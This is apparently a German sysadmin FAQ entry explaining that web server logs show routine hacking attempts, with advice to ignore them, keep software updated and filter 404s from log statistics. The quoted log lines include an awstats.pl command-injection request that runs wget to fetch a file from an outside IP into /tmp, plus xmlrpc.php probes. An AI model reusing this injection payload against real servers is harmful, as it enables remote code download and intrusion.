Problem:
Es wird ständig versucht den Server zu hacken. Z.B. über's Web (es wird aber jeweils ein 404 ausgelöst):
"GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%[...] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%[...] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2 "POST /xmlrpc.php HTTP/1.1" "POST /blog/xmlrpc.php HTTP/1.1" "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" "POST /drupal/xmlrpc.php HTTP/1.1" "POST /phpgroupware/xmlrpc.php HTTP/1.1" "POST /wordpress/xmlrpc.php HTTP/1.1" "POST /xmlrpc.php HTTP/1.1" "POST /xmlrpc/xmlrpc.php HTTP/1.1" "POST /xmlsrv/xmlrpc.php HTTP/1.1"
Lösung:
Dies läßt sich nicht unterbinden. Das sind Versuche von irgendwelchen Script-Kiddies. Das darf man getrost ignorieren. Falls man allerdings eine dieser Software-Packete wirklich nutzt, sollte man darauf achten, daß man jeweils die aktuelle Version einsetzt. Sonst könnte dies tatsächlich mal zu einem Problem werden.
Erweiterte Lösung:
Zu einem Problem könnte es werden, wenn man die Logfiles statistisch auswertet und die ganzen 404-Fehler nicht drin haben will. Aber in fast allen Logfile-Analyse-Programmen kann man bestimmte Files/Dirs auf "Ignorieren" setzen.
Kategorien:
Stichwörter:
apache · hacking · awstats · xmlrpc · software · logfile · http ·